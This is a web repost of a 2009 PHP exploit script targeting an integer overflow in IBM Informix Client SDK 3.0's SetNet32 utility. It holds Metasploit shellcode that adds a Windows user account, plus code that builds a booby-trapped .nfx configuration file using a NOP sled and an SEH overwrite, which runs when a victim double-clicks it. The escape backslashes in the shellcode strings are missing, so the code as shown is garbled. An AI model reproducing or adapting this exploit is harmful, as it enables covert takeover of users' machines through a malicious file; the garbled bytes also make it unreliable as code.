Home / os / win10

9sg_ibm_setnet32.txt

Posted on 06 October 2009

<?php
/* IBM Informix Client SDK 3.0 SetNet32 File (.nfx) Hostsize integer overflow exploit
(2k3 sp0)
by Nine:Situations:Group::bruiser
site: http://retrogod.altervista.org/

vulnerable packages: IBM Informix Client SDK 3.0,
IBM Informix Connect Runtime 3.x,
possibly other products carrying the setnet32 utility.

User-supplied value for the Hostsize field results in an integer overflow and
subsequently a complete stack smash by passing an overlong string to the HostList
one allowing an attacker to execute arbitrary code.
All modules in memory are compiled with /SAFESEH=on but it's still possible to
execute arbitrary code by passing a certain trusted handler from kernel32.dll.
We fall in a more convenient condition with eip overwritten: now ebp register
points to a portion of our buffer. So this is context-dependent, try aganst
another OS.
Other attacks are possible through the ProtoSize or ServerSize fields.
It works by double clicking on the resulting .nfx file.

*/

# windows/adduser - 436 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=sun, PASS=tzu
$_scode=
"x89xe1xd9xc2xd9x71xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x45x50" .
"x43x30x4cx4bx50x45x47x4cx4cx4bx43x4cx45x55" .
"x43x48x43x31x4ax4fx4cx4bx50x4fx45x48x4cx4b" .
"x51x4fx47x50x45x51x4ax4bx47x39x4cx4bx46x54" .
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" .
"x4dx54x49x50x44x34x44x47x49x51x49x5ax44x4d" .
"x45x51x48x42x4ax4bx4bx44x47x4bx51x44x47x54" .
"x44x44x44x35x4bx55x4cx4bx51x4fx47x54x45x51" .
"x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx45x51" .
"x4ax4bx4cx49x51x4cx47x54x45x54x48x43x51x4f" .
"x46x51x4cx36x43x50x46x36x42x44x4cx4bx51x56" .
"x50x30x4cx4bx47x30x44x4cx4cx4bx44x30x45x4c" .
"x4ex4dx4cx4bx45x38x44x48x4bx39x4ax58x4cx43" .
"x49x50x43x5ax50x50x43x58x4cx30x4dx5ax45x54" .
"x51x4fx45x38x4dx48x4bx4ex4dx5ax44x4ex51x47" .
"x4bx4fx4dx37x45x33x42x4dx45x34x46x4ex45x35" .
"x44x38x43x55x51x30x46x4fx45x33x47x50x42x4e" .
"x42x45x43x44x47x50x44x35x42x53x43x55x42x52" .
"x47x50x43x43x43x45x42x4ex51x30x43x44x43x4a" .
"x43x45x51x30x46x4fx51x51x47x34x47x34x51x30" .
"x46x46x47x56x47x50x42x4ex45x35x43x44x51x30" .
"x42x4cx42x4fx43x53x43x51x42x4cx42x47x42x52" .
"x42x4fx42x55x42x50x51x30x51x51x45x34x42x4d" .
"x43x59x42x4ex45x39x43x43x42x54x43x42x43x51" .
"x43x44x42x4fx44x32x42x53x47x50x42x53x44x35" .
"x42x4ex47x50x46x4fx47x31x50x44x47x34x45x50" .
"x41x41";

$____boom =
"[Setnet32]
".
"Format=x203.00x203.00.TC1x20x20
".
"[ENVIRONMENT]
".
"CC8BITLEVEL=
".
"CLIENT_LOCALE=EN_US.8859-1
".
"COLLCHAR=
".
"CONRETRY=
".
"CONTIME=
".
"DB2CLI=
".
"DBANSIWARN=
".
"DBDATE=
".
"DBLANG=EN_US.CP1252
".
"DBMONEY=
".
"DBNLS=
".
"DBPATH=
".
"DBTEMP=
".
"DBTIME=
".
"DELIMIDENT=n
".
"ESQLMF=
".
"FET_BUF_SIZE=
".
"BIG_FET_BUF_SIZE=
".
"IFX_MULTIPREPSTMT=
".
"GL_DATE=
".
"GL_DATETIME=
".
"IFX_EXTDIRECTIVES=
".
"IFX_XASTDCOMPLIANCE_XAEND=
".
"IFX_DIRTY_WAIT=
".
"INFORMIXDIR=C:Programx20FilesIBMInformixConnect\r
".
"INFORMIXSERVER=aaaaaaaaaaaa
".
"INFORMIXSQLHOSTS=
".
"LANG=
".
"LC_COLLATE=
".
"LC_CTYPE=
".
"LC_MONETARY=
".
"LC_NUMERIC=
".
"LC_TIME=
".
"DBALSBC=
".
"DBAPICODE=
".
"DBASCIIBC=
".
"DBCENTURY=
".
"DBCODESET=
".
"DBCONNECT=
".
"DBCSCONV=
".
"DBCSOVERRIDE=
".
"DBCSWIDTH=
".
"DBFLTMSK=
".
"DBMONEYSCALE=
".
"DBSS2=
".
"DBSS3=
".
"IFX_AUTOFREE=
".
"IFX_DEFERRED_PREPARE=
".
"NODEFDAC=
".
"OPTMSG=
".
"OPTOFC=
".
"IFX_USE_PREC_16=
".
"IFX_PAD_VARCHAR=
".
"NOZEROMDY=
".
"BLANK_STRINGS_NOT_NULL=
".
"IFX_FLAT_UCSQ=
".
"[Size]
".
"CLIENT_LOCALE=12
".
"DB_LOCALE=0
".
"NumOfHosts=999
".
"NumOfServers=1
".
"NumOfProtocols=9
".
"ServerSize=16
".

"HostSize=1517
".                                //boom!!

"ProtoSize=16
".
"[Lists]
".
"INFORMIXSERVERLIST=aaaa;
".
"HostList=".

str_repeat("x90",312).

$_scode.

str_repeat("x90",1115 - strlen($_scode)).

"xe9x01xfbxffxff".                             //jmp back to shellcode
"x90x90x90x90".                                 //junk, this is overwritten in some way
"x87x35xe4x77".                                 //pointer to the next SEH record
"x87x35xe4x77".                                 //SE handler, a registered one from kernel32.dll
"xC0xF0x03xF1".                                 //do not touch
"x41x41x41x41".                                 //do not touch
"x9bx71xd8x77".                                 //call ebp, user32.dll and further jno short
str_repeat("x9bx71xd8x77",64).                  //do not touch
";
".
"PROTOCOLLIST=olsoctcp;onsoctcp;olsocspx;onsocspx;sesoctcp;sesocspx;seipcpip;olipcnmp;onipcnmp;
".
"[__infx_sqlhost_aaaaaaaaaaaaaaa]
".
"HOST=
".
"SERVICE=1527
".
"PROTOCOL=olsoctcp
".
"OPTIONS=
".
"[__infx_host_192.168.0.1]
".
"USER=informix
".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20".
"x200x20x200x20x200x20x200x20x200
".
"AskPassword=P
".
"[__infx_host_192.168.0.2]
".
"USER=aaaa
".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x2049x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200
".
"AskPassword=P
".
"[__infx_host_192.168.0.3]
".
"USER=informix
".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200
".
"AskPassword=P
".
"x00";

file_put_contents("9sg.nfx",$____boom);
?>

 

TOP